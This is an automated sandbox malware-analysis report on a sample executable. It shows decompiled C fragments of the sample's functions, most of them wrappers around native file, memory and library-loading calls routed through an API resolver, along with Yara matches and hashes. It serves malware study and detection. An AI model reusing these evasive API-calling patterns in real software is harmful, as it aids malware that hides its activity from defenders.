                                                                                                        • Opcode Fuzzy Hash: 221320d8b9f422cf1b650d6a96f7e4081ca984872c3473ba484b355ca850635f
                                                                                                        • Instruction Fuzzy Hash: DE3181B350425AAFEF09EF66DA49B267FF9EB05252B384595F84EC7250D639D800CB20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004057B2, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004057B2(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                                        0x004057be
                                                                                                        0x004057c0
                                                                                                        0x004057e8
                                                                                                        0x004057cd
                                                                                                        0x004057d2
                                                                                                        0x004057dd
                                                                                                        0x00000000
                                                                                                        0x004057fa
                                                                                                        0x004057e6
                                                                                                        0x004057e6
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057D2
                                                                                                        • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004057E0
                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 190613189-0
                                                                                                        • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                        • Instruction ID: 042c172281cf084eebf1820456e7eb749b121a10276c912c68532230cfd8689c
                                                                                                        • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                        • Instruction Fuzzy Hash: BBF0A736249D51DBC2029B295C44E6FBEA4EF95355F14057EF440F3180D335AC11ABBB
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Analysis Process: KY4cmAI0jU.exe PID: 1632 Parent PID: 2128 KY4cmAI0jU.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 00418280, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DD0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                                                                        0x00418283
                                                                                                        0x0041828f
                                                                                                        0x00418297
                                                                                                        0x0041829c
                                                                                                        0x004182a2
                                                                                                        0x004182bd
                                                                                                        0x004182c5
                                                                                                        0x004182c9

                                                                                                        APIs
                                                                                                        • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID: !:A$b=A$b=A
                                                                                                        • API String ID: 2738559852-704622139
                                                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                        • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                                                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                        • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 87%
                                                                                                        			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t29;
				void* _t30;
				void* _t31;

				_v8 =  &_v536;
				_t15 = E0041AB60( &_v12, 0x104, _a8);
				_t30 = _t29 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF80(__eflags, _v8);
					_t31 = _t30 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						_push(0);
						_push( &_v12);
						E0041B200();
						_t31 = _t31 + 8;
					}
					_t18 = E00419310(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                        0x00409b4c
                                                                                                        0x00409b4f
                                                                                                        0x00409b54
                                                                                                        0x00409b59
                                                                                                        0x00409b63
                                                                                                        0x00409b68
                                                                                                        0x00409b6b
                                                                                                        0x00409b6d
                                                                                                        0x00409b72
                                                                                                        0x00409b74
                                                                                                        0x00409b75
                                                                                                        0x00409b7a
                                                                                                        0x00409b7a
                                                                                                        0x00409b81
                                                                                                        0x00409b89
                                                                                                        0x00409b8c
                                                                                                        0x00409b8e
                                                                                                        0x00409ba2
                                                                                                        0x00000000
                                                                                                        0x00409ba4
                                                                                                        0x00409baa
                                                                                                        0x00409b5e
                                                                                                        0x00409b5e
                                                                                                        0x00409b5e

                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                        • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                                                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                        • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004181D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                        • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                                                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                        • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004183AB, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 58%
                                                                                                        			E004183AB(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				0x8b55();
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E00418DD0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                        0x004183ab
                                                                                                        0x004183b3
                                                                                                        0x004183bf
                                                                                                        0x004183c7
                                                                                                        0x004183e9
                                                                                                        0x004183ed

                                                                                                        APIs
                                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167126740-0
                                                                                                        • Opcode ID: b9b4baab3952e26046f1dae231f2c1dfd96956f86ddeb86d4faadb0d893fc2a8
                                                                                                        • Instruction ID: 35888b70c65dfc0163fa112b68e764a4b502c050a33ea63c4b08dc66daa96bfc
                                                                                                        • Opcode Fuzzy Hash: b9b4baab3952e26046f1dae231f2c1dfd96956f86ddeb86d4faadb0d893fc2a8
                                                                                                        • Instruction Fuzzy Hash: DCF01CB5210118AFDB14DF99DC80EEB77A9AF98354F158649FE1997281C631E811CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004183B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004183B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DD0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                        0x004183bf
                                                                                                        0x004183c7
                                                                                                        0x004183e9
                                                                                                        0x004183ed

                                                                                                        APIs
                                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167126740-0
                                                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                        • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                                                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                        • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004182FD, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E004182FD(intOrPtr _a8, void* _a12) {
				long _t9;
				void* _t12;

				asm("fnsave [edi+0x55]");
				_t6 = _a8;
				_t2 = _t6 + 0x10; // 0x300
				_t3 = _t6 + 0xc50; // 0x409753
				E00418DD0(_t12, _a8, _t3,  *_t2, 0, 0x2c);
				_t9 = NtClose(_a12); // executed
				return _t9;
			}





                                                                                                        0x004182fe
                                                                                                        0x00418303
                                                                                                        0x00418306
                                                                                                        0x0041830f
                                                                                                        0x00418317
                                                                                                        0x00418325
                                                                                                        0x00418329

                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: c90ff59630fe6742cdde2aa5f3b6122ecae696b72f16b644d0c59ab3f2abe6e5
                                                                                                        • Instruction ID: 4108a9b127e3200188a38c3e992091fbe64e67e7d9d5aa2ee4baae097f923992
                                                                                                        • Opcode Fuzzy Hash: c90ff59630fe6742cdde2aa5f3b6122ecae696b72f16b644d0c59ab3f2abe6e5
                                                                                                        • Instruction Fuzzy Hash: 16E012752403147BD710EFD4DC46ED77768EF48764F158559BE1D9B282C570F91086D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00418300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00418300(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E00418DD0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                                        0x00418303
                                                                                                        0x00418306
                                                                                                        0x0041830f
                                                                                                        0x00418317
                                                                                                        0x00418325
                                                                                                        0x00418329

                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                        • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                                                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                        • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0041827B, Relevance: 1.5, APIs: 1, Instructions: 19filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 9e64409247b88fe6b472bb07dfce1deab2a9dd0356c7be9c41a0b9bd585bd4b1
                                                                                                        • Instruction ID: 6d2258c97ccb99f6fd326b1a3572b2ef44980ec345cf559fb359b116fe9e93d0
                                                                                                        • Opcode Fuzzy Hash: 9e64409247b88fe6b472bb07dfce1deab2a9dd0356c7be9c41a0b9bd585bd4b1
                                                                                                        • Instruction Fuzzy Hash: 80D0A9762081486FC719CAA8AC84CBB7399EB8C220708964EB6ACCB540C136A8028764
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B098F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 537baf0839ca74ab9ee8a0c36a4d17d7037c3b97d2d12bd8feb8d6a504a471fa
                                                                                                        • Instruction ID: 5e015fd064347010c23f140bdb185a53197db3288e770c5224d51937c6000e5f
                                                                                                        • Opcode Fuzzy Hash: 537baf0839ca74ab9ee8a0c36a4d17d7037c3b97d2d12bd8feb8d6a504a471fa
                                                                                                        • Instruction Fuzzy Hash: 4D90026260101502D20171594404656044AD7D0381FD1C476A1014555ECA6589E2F1B1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B09860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 45c1b690913f4ebe220028810a02cbcd984dac01828d952c9f1ed5e8ded5cbe5
                                                                                                        • Instruction ID: 91357d1f13e8267e36db19f8b42369fa2da2f5bc6e33c744dc0831754a86d323
                                                                                                        • Opcode Fuzzy Hash: 45c1b690913f4ebe220028810a02cbcd984dac01828d952c9f1ed5e8ded5cbe5
                                                                                                        • Instruction Fuzzy Hash: E190027220101413D211615945047470449D7D0381FD1C876A0414558D969689A2F1A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B09840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: b11e20e2534a05002ac1e22b274ef500aa8ed6efdc03deaeb102562ff076f070
                                                                                                        • Instruction ID: 2cd3385f015d64075c4d06ba46aca9257d13101c4d69196db5cb460a5a6a3bb1
                                                                                                        • Opcode Fuzzy Hash: b11e20e2534a05002ac1e22b274ef500aa8ed6efdc03deaeb102562ff076f070
                                                                                                        • Instruction Fuzzy Hash: BF900262242051525645B15944045474446E7E03817D1C476A1404950C856698A6E6A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: b696000d4c1cdeb7ec559bd7cc348334622c98362ab7a3b2b52d51c7f77da563
                                                                                                        • Instruction ID: edd3adc0e7d7b1e1c63f73c0789b1c1c083eb92ff36d3406f49c88e5611999bc
                                                                                                        • Opcode Fuzzy Hash: b696000d4c1cdeb7ec559bd7cc348334622c98362ab7a3b2b52d51c7f77da563
                                                                                                        • Instruction Fuzzy Hash: CD9002A234101442D20061594414B460445D7E1341F91C479E1054554D8659CCA2B1A6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B09910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: fa1c93ddda2d9c327977bbe579b723b9dfd34a9b7c2e0a81abb52daa2cbe440b
                                                                                                        • Instruction ID: d974365aa23a72b55b6c2c8f5747e36cb3ad6ac96b2b3091f16439af79ee0b85
                                                                                                        • Opcode Fuzzy Hash: fa1c93ddda2d9c327977bbe579b723b9dfd34a9b7c2e0a81abb52daa2cbe440b
                                                                                                        • Instruction Fuzzy Hash: 1C9002B220101402D240715944047860445D7D0341F91C475A5054554E86998DE5B6E5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B09A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 265b439cad6c0991a8e22cba7f45e320533c97fb1dd9498078637c7472608679
                                                                                                        • Instruction ID: a0b930abfb394b0f8a1c951306ceb4bfc832ddf8b90e39dfd7afae5bb07564fa
                                                                                                        • Opcode Fuzzy Hash: 265b439cad6c0991a8e22cba7f45e320533c97fb1dd9498078637c7472608679
                                                                                                        • Instruction Fuzzy Hash: 45900262601010424240716988449464445FBE1351791C575A0988550D859988B5A6E5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B09A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 3abd2c4436e3685ecc0ecae28748eea317ce35c9c173a67287c0422960521210
                                                                                                        • Instruction ID: 8441ce461e48a6cef1d313b1cc4b03332679651fb4b3c7bba2ba925ec9e932ca
                                                                                                        • Opcode Fuzzy Hash: 3abd2c4436e3685ecc0ecae28748eea317ce35c9c173a67287c0422960521210
                                                                                                        • Instruction Fuzzy Hash: 2490027220141402D2006159481474B0445D7D0342F91C475A1154555D866588A1B5F1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B09A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: fb6b482b68f9ad60f9c70971256df425afdc902c30eee04983305f2a4c98a493
                                                                                                        • Instruction ID: ace3c59f3e87232f862e835dd152d11cd2dd06bacfd240c03e2178b1b6488f82
                                                                                                        • Opcode Fuzzy Hash: fb6b482b68f9ad60f9c70971256df425afdc902c30eee04983305f2a4c98a493
                                                                                                        • Instruction Fuzzy Hash: BD90026221181042D30065694C14B470445D7D0343F91C579A0144554CC95588B1A5A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 5c163c804892b272d779372f66361fba962c5d844e58d38492b96e019c235fe3
                                                                                                        • Instruction ID: b8c8f4c6be82913c39bffaeb979c3e2320e526f576825a22e244d938da1b86bc
                                                                                                        • Opcode Fuzzy Hash: 5c163c804892b272d779372f66361fba962c5d844e58d38492b96e019c235fe3
                                                                                                        • Instruction Fuzzy Hash: 359002A220201003420571594414656444AD7E0341B91C475E1004590DC56588E1B1A5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B09540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: f90e96be684ddbca7b3c996f4d6d17ecb78e8673d430fab38872c6d737d5b498
                                                                                                        • Instruction ID: a6121db2bf1bbf8c138d1cd3ccf670cb6a14256d4302e6a35762b0352766df0b
                                                                                                        • Opcode Fuzzy Hash: f90e96be684ddbca7b3c996f4d6d17ecb78e8673d430fab38872c6d737d5b498
                                                                                                        • Instruction Fuzzy Hash: 9A900266211010030205A55907045470486D7D5391391C475F1005550CD66188B1A1A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 05ff8cb6cb6455544a44d26b39bf5981e6119eb8422910f5a1067ac327559c8f
                                                                                                        • Instruction ID: 0b1bbf375f832dbfa726df4a6c6d2a3c21f0a7d679fbf55a174b5e7b34aee108
                                                                                                        • Opcode Fuzzy Hash: 05ff8cb6cb6455544a44d26b39bf5981e6119eb8422910f5a1067ac327559c8f
                                                                                                        • Instruction Fuzzy Hash: 2F90027220109802D2106159840478A0445D7D0341F95C875A4414658D86D588E1B1A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B09660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 65e508a756b443e187ea5e343dde9cfce906d84ce88fcd0813d8982ee424408e
                                                                                                        • Instruction ID: 21ff3d02950b660b7dabcee2c91836f37840b0ada37d19255ff15d64dbe942eb
                                                                                                        • Opcode Fuzzy Hash: 65e508a756b443e187ea5e343dde9cfce906d84ce88fcd0813d8982ee424408e
